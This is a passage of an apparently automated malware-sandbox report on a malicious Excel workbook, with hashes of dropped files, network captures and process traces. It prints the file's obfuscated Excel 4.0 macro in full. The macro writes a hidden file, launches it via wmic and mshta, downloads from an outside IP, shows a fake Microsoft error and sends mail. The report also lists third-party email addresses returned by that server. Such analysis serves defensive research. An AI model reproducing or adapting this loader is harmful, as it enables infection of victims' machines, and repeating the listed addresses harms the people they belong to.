                    SHA-512:F650C12B7E675C8FE4B7257A58C81F7CC741D44F7A84E638605789C01872F97193101BF0117CCAFE9168D8F92D459C7F95C72F9B184FC158AB8BE82F81142C3F
                    Malicious:false
                    Reputation:low
                    IE Cache URL:http://132.148.135.183:8080/Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG
                    Preview: {"don.karlin@nourison.com","catherine.bruce@johngeorge.co.uk","dking@asbmb.org","info@americanadventurepark.com","matt@bighause.com"}
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6F135607.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 295 x 52, 8-bit/color RGB, non-interlaced
                    Category:dropped
                    Size (bytes):2980
                    Entropy (8bit):7.906485537887338
                    Encrypted:false
                    SSDEEP:48:ui8wWBWX0IWUQzsjVdrzBnS97W9ZUsBrTk/7YCoGPUYqekS3aTNg3UD+b5F7kl6S:TKD0QzsjVd3BnS9K9ZUs1LCoqUCYg3U3
                    MD5:C484A69A7647C62945060924243190F1
                    SHA1:078A31ACF519D8192E63CDEBA49815CC6361F9D6
                    SHA-256:A578E2C85FC0AB3264AACEEC5545C8C27F902DB0CCB8B2B3997964AC92F86933
                    SHA-512:9E9A1965B25C5C6373395A8D3E81C64BA9A55F269041C4273C9DE41CBB05BDDED7F4E3D1FE19E55AF6E05662576962B54BA14700C56AD38FE7943962E09E5362
                    Malicious:false
                    Reputation:low
                    Preview: .PNG........IHDR...'...4.....G.i....kIDATx..yX.....1...l..". ....K)7*ov.z.......JoR...d..mQ..i.....\q.S...E0.Ad.E.f.....^...W.s..g.8s.....=..}.s~.. z.q......v. .. ......BhHu.!4.:...R.A.... ..TG.BC.#..!......BhHu.!4.:...R.A.... ..TG.BC.#..!......Bh.=d7~.V...N$%.......?.?;.@.+....D,L..].vw.."_~n....j3%j...K.c........s........@...+.J..a....p.\........e..'.C.......oW.......*.^....C.i...<s.....6hV.I.....".\..-.e.fc.W......m...*np'...7.....Z....>}x.g.S'.t.@Cq.....56vga.?.7.4;.....G.._........V.....s..W5*...s...c."$=..+.{....M..?..o.X..j.....f.Y.5,..t...$....\...0V(?..AkN}..?.}L..>.F..v....z..i...G..yc>..../.~q1.{..<<..iw4.I...!s.L8..o..b...q.W-...`..nE..gH{..mN......)|.......9.7d.R{;./PHz.YW..p... .)#..)....X.2r..Y...LvS.._...{.L.. ...O.....u..w.................[[.xv....I.....>w...@]AQ.g)-7.}..F<. ....R.....u..Q.5.E...!.MxcY..C&.!.....+..._.K..H".^...`..Z.fM....s.....v....3..(...V..y.....O'.7....r[.|...0.x...#..g~...w4*U..............:.z.....S.k.
                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BEF1285C.png
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:PNG image data, 238 x 337, 8-bit/color RGBA, non-interlaced
                    Category:dropped
                    Size (bytes):38157
                    Entropy (8bit):7.96137177194393
                    Encrypted:false
                    SSDEEP:768:7PiEGNOfxgpvUM7w1phhsL+ZfBwnTV+YoS2bUoMokqk++yd6OAd/r:7PFwJpvc1e+BwT8YIbDMz+1d6xt
                    MD5:B88B9DF024814E6C791FDAC471ABD26C
                    SHA1:6FB92BB20F7A51B40E03467C2EBB217A8E21E21A
                    SHA-256:02F3AB917A42A10560A274A9CD91FDA01D7BC428C7428CCAF8CCFF1F46DEA39F
                    SHA-512:67E6B7FAE7476847835E5A1F17FBFA60DC35B2AAC299A025102540BBA72D8A3CC120FA69E172FBADE6A4B68F464A98005FC38145CC618A6DC45D8C058F704E9E
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview: .PNG........IHDR.......Q.....s..6...JiCCPICC Profile..x..W.TS...[RIh..H...R.K..E..*..I ...D....]D@].U.E...ZQ...]......l..I.]=...s........{g...I.....y.|Y|D.kBj.......Z...x|...........7..../.(......'.... q.g...<......|..>Po=#_.. 6...!.*q...(q..W.l..9....L..dY.h7C=....y.o@.*..%..!..x..#!...7M...p...'....C.<^..V..r.X.....?..%/W1...6.H.......F.(%.A.#...X..wb...b.*RD&..QS...k.....x.Q..B......32..\...A....D..EByX...F6->v.g.8l....L.Wi.R.............D.).1j.89.bm...(..fS$.........m ..J"B...LYx..^.'...[$.sc4.*_........7..Y(a'.......s..C..c...$M.X.4?$^3..47Nc.S...J......\<0..H5?.#.KT.gd......A4..P....2.4....=M=.z$....d.!p.h.g..F$...._...|h^.jT.....V.t..........<..r.o.j.d.[2x.5...a...)...&Z.Q..t.-.a.Pb$1.....?.......>..`._..........N...b.7...8..=.kr..:g...z.!x...8.7...h..A.P..D...[....U.5v.W.J.F..8|;S.I.s.EY.+..5c.....o.s.....Q.Zb..}X.v.;.....;.5c..J<....V..xU<9.G..?....r.z.n..|a....8.3e.,Q>....B.W..9........;.~M.b.......]q............8........Z..
                    C:\Users\user\AppData\Local\Temp\5042.tmp
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:Microsoft Excel 2007+
                    Category:dropped
                    Size (bytes):70150
                    Entropy (8bit):7.880617705749373
                    Encrypted:false
                    SSDEEP:1536:+Y3isa9Sp9SEP1PFwJpvc1e+BwT8YIbDMz+1d6x9WGdDn:+Wo9SpzyMrbDu+1d6x9WGdb
                    MD5:4A531EC1D9AB9D123B6EFFF3FD301F5A
                    SHA1:AF0B19D13A6E294899FC29923058639028930B48
                    SHA-256:E041FB22A003EAA78F89B27E77BFFBCAD40FBB7CEEC9003A4DDB0781AF6BF903
                    SHA-512:28DC0AC895AEAC800E377815ABCAE82A19189942548794DC4B4F73E8CDA69BACD16627B903DCF9065C76585E501CF4E28114E5F44B87E22FF584AD8F7A89B06C
                    Malicious:false
                    Reputation:low
                    Preview: PK..........!.?...............[Content_Types].xml ...(....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................U.n.0....?..."......C..=....=3..&...L".}....`.Vr......W.........;6.3.WA.....o.'.`.^K.<tl.....-...!..mr...@..'....vV!9..5.E..A.A\.f...>..m.1.r..V.....]&.....B.1..5JfJT<y....+..7...@.-wR.p....DR.q2~..A|.J~e.4"...d..K..^3'dM.7&..2..C.9.y..E.JFCs+S.).9#z+.....z..GF...?..v.....^C?..p...G..Czx..#.2....;E....^.$.CEF.d:. .u..........(.A=::...9..3..yk...C..=&CS'...i...._...0&..6..|.~$1..s.h..v....<.j...fq..%=...n#.....
                    C:\Users\user\Desktop\~$subscription-673890410.xlsb
                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    File Type:data
                    Category:dropped
                    Size (bytes):165
                    Entropy (8bit):1.4377382811115937
                    Encrypted:false
                    SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                    MD5:797869BB881CFBCDAC2064F92B26E46F
                    SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                    SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                    SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                    Malicious:true
                    Reputation:high, very likely benign file
                    Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                    Static File Info

                    General

                    File type:Microsoft Excel 2007+
                    Entropy (8bit):7.872332333165425
                    TrID:
                    • Excel Microsoft Office Open XML Format document with Macro (51004/1) 36.56%
                    • Microsoft Excel Office Binary workbook document (40504/1) 29.03%
                    • Excel Microsoft Office Open XML Format document (40004/1) 28.67%
                    • ZIP compressed archive (8000/1) 5.73%
                    File name:subscription-673890410.xlsb
                    File size:70272
                    MD5:47ee46b3521d1f85743ab56ac8c4f4b3
                    SHA1:a4b5e087009458f9a6a0e6f7b2e8ebbb261233f9
                    SHA256:444a0953b513aaad678d37e960dd7fe5841025e0bebf2e71eb350d4709a0f34f
                    SHA512:f37d22e2ed5999269df9dfe9e56a146a9acff9cc4ab91055ff03d1f9deedfa54fe95ff97962419bbda00ebfd67b271d61e151b91cd3c02d9d960587001f878e3
                    SSDEEP:1536:UW9PFwJpvc1e+BwT8YIbDMz+1d6xUBiNNQrU8Qh8Y42pW9SEPKgdi:VyMrbDu+1d6xUB+N18YLpWzigdi
                    File Content Preview:PK..........!...l.....W.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                    File Icon

                    Icon Hash:e4e2ea8aa4b4b4b4

                    Static OLE Info

                    General

                    Document Type:OpenXML
                    Number of OLE Files:1

                    OLE File "subscription-673890410.xlsb"

                    Indicators

                    Has Summary Info:
                    Application Name:
                    Encrypted Document:
                    Contains Word Document Stream:
                    Contains Workbook/Book Stream:
                    Contains PowerPoint Document Stream:
                    Contains Visio Document Stream:
                    Contains ObjectPool Stream:
                    Flash Objects Count:
                    Contains VBA Macros:

                    Macro 4.0 Code

                    0,564,=FOPEN("C:\Pr" & CHAR(111) & "gramD" & CHAR(97) & "ta" & CHAR(92) & "xkNURU" & CHAR(81) & CHAR(97) & "Ci" & CHAR(75) & "QrGY.rt" & CHAR(102), 3)
                    1,564,=D1008+C8202
                    4,564,=D8794+D1580
                    5,564,=D4348+B3960
                    6,564,=C119+C9883
                    7,564,=A1859+A9629
                    9,564,=A6435+D5222
                    11,564,=A8751+C3510
                    13,564,=FOR.CELL("YzlbOtjxp",Sheet1!AX158:BI561, TRUE)
                    20,564,=B1780+B3274
                    22,564,=D1522+A601
                    23,564,=B4601+B9463
                    24,564,=B7234+C2762
                    25,564,=FWRITE(0,CHAR(YzlbOtjxp))
                    26,564,=A6670+B9834
                    30,564,=A6108+C5040
                    35,564,=NEXT()
                    36,564,=C2633+D5053
                    37,564,=B1881+C7725
                    39,564,=C9408+C1593
                    41,564,=B7395+C8573
                    42,564,=C2936+A8887
                    43,564,=B2579+C3631
                    46,564,=D9362+C3375
                    48,564,=EXEC(CHAR(119) & "mic p" & CHAR(114) & "ocess cal" & CHAR(108) & " create" & CHAR(32) & "" & CHAR(34) & "" & CHAR(109) & CHAR(115) & "hta C:\ProgramData\x" & CHAR(107) & CHAR(78) & "URUQaCiKQrGY.rt" & CHAR(102) & CHAR(34))
                    49,564,=D6941+D2952
                    50,564,=B9788+C4422
                    52,564,=D9374+A6694
                    53,564,=B1509+B4680
                    59,564,=D6553+B8799
                    60,564,=D7252+D1008
                    62,564,=A412+C3534
                    63,564,=CALL("ur" & CHAR(108) & "" & CHAR(109) & "on", CHAR(85) & "RLD" & CHAR(111) & "wnlo" & CHAR(97) & "dToFil" & CHAR(101) & CHAR(65) & "","JJC" & CHAR(67) & "JJ", 0, "http://1" & CHAR(51) & "2.148.135.183:8080/Q2" & CHAR(87) & "5VWUFL5" & CHAR(86) & CHAR(67) & "MQ7" & CHAR(74) & CHAR(81) & "PETG3CCT" & CHAR(89) & "X7" & CHAR(50) & CHAR(90) & "4R25PDG", CHAR(67) & CHAR(58) & "" & CHAR(92) & CHAR(80) & "rogram" & CHAR(68) & "ata\dDVVHyrpu" & CHAR(101) & "A.txt",0,0)
                    64,564,=D9586+B2153
                    65,564,=C7388+D8463
                    66,564,=D1369+B9278
                    72,564,=C1301+A511
                    73,564,=ALERT("Error! Send" & CHAR(105) & CHAR(110) & "g " & CHAR(114) & "eport " & CHAR(116) & CHAR(111) & " Micros" & CHAR(111) & "" & CHAR(102) & "" & CHAR(116) & "...")
                    74,564,=C3602+B3036
                    77,564,=D4442+D9946
                    78,564,=B514+D6826
                    79,564,=C1653+A7377
                    82,564,=D5827+A9220
                    83,564,=A523+A1784
                    87,564,=FOPEN("C:\ProgramData\dDV" & CHAR(86) & CHAR(72) & "yrpueA." & CHAR(116) & CHAR(120) & CHAR(116),1)
                    88,564,=A386+C7050
                    89,564,=C419+A224
                    90,564,=A5811+C6693
                    94,564,=C9342+A3772
                    95,564,=B5484+C9052
                    96,564,=B704+B6321
                    97,564,=B5621+D4829
                    102,564,=SEND.MAIL(EVALUATE(FREAD(US88,255)))
                    103,564,=A6110+D3316
                    106,564,=B4582+C2778
                    109,564,=B2114+D9698
                    110,564,=C1288+B3713
                    111,564,=C3646+A2828
                    113,564,=D1647+D4682
                    115,564,=RETURN()
                    

                    Network Behavior

                    Network Port Distribution

                    TCP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Nov 24, 2021 16:59:47.532156944 CET491658080192.168.2.22132.148.135.183
                    Nov 24, 2021 16:59:47.697361946 CET808049165132.148.135.183192.168.2.22
                    Nov 24, 2021 16:59:47.697489977 CET491658080192.168.2.22132.148.135.183
                    Nov 24, 2021 16:59:47.698044062 CET491658080192.168.2.22132.148.135.183
                    Nov 24, 2021 16:59:47.862934113 CET808049165132.148.135.183192.168.2.22
                    Nov 24, 2021 16:59:48.161922932 CET808049165132.148.135.183192.168.2.22
                    Nov 24, 2021 16:59:48.162034988 CET491658080192.168.2.22132.148.135.183
                    Nov 24, 2021 17:01:03.161906958 CET808049165132.148.135.183192.168.2.22
                    Nov 24, 2021 17:01:03.162997007 CET491658080192.168.2.22132.148.135.183

                    HTTP Request Dependency Graph

                    • 132.148.135.183:8080

                    HTTP Packets

                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    0192.168.2.2249165132.148.135.1838080C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    TimestampkBytes transferredDirectionData
                    Nov 24, 2021 16:59:47.698044062 CET0OUTGET /Q2W5VWUFL5VCMQ7JQPETG3CCTYX72Z4R25PDG HTTP/1.1
                    Accept: */*
                    UA-CPU: AMD64
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                    Host: 132.148.135.183:8080
                    Connection: Keep-Alive
                    Nov 24, 2021 16:59:48.161922932 CET0INHTTP/1.1 200 OK
                    Server: nginx/1.0.15
                    Date: Wed, 24 Nov 2021 15:59:48 GMT
                    Content-Type: text/plain; charset=utf-8
                    Connection: keep-alive
                    Content-Length: 133
                    Data Raw: 7b 22 64 6f 6e 2e 6b 61 72 6c 69 6e 40 6e 6f 75 72 69 73 6f 6e 2e 63 6f 6d 22 2c 22 63 61 74 68 65 72 69 6e 65 2e 62 72 75 63 65 40 6a 6f 68 6e 67 65 6f 72 67 65 2e 63 6f 2e 75 6b 22 2c 22 64 6b 69 6e 67 40 61 73 62 6d 62 2e 6f 72 67 22 2c 22 69 6e 66 6f 40 61 6d 65 72 69 63 61 6e 61 64 76 65 6e 74 75 72 65 70 61 72 6b 2e 63 6f 6d 22 2c 22 6d 61 74 74 40 62 69 67 68 61 75 73 65 2e 63 6f 6d 22 7d
                    Data Ascii: {"don.karlin@nourison.com","catherine.bruce@johngeorge.co.uk","dking@asbmb.org","info@americanadventurepark.com","matt@bighause.com"}


                    Code Manipulations

                    Statistics

                    Behavior

                    Click to jump to process

                    System Behavior

                    General

                    Start time:16:59:19
                    Start date:24/11/2021
                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    Wow64 process (32bit):false
                    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                    Imagebase:0x13f580000
                    File size:28253536 bytes
                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Start time:16:59:42
                    Start date:24/11/2021
                    Path:C:\Windows\System32\wbem\WMIC.exe
                    Wow64 process (32bit):false
                    Commandline:wmic process call create "mshta C:\ProgramData\xkNURUQaCiKQrGY.rtf"
                    Imagebase:0xffd50000
                    File size:566272 bytes
                    MD5 hash:FD902835DEAEF4091799287736F3A028
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:moderate

                    General

                    Start time:16:59:44
                    Start date:24/11/2021
                    Path:C:\Windows\System32\mshta.exe
                    Wow64 process (32bit):false
                    Commandline:mshta C:\ProgramData\xkNURUQaCiKQrGY.rtf
                    Imagebase:0x13f830000
                    File size:13824 bytes
                    MD5 hash:95828D670CFD3B16EE188168E083C3C5
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Disassembly

                    Code Analysis

                    Reset < >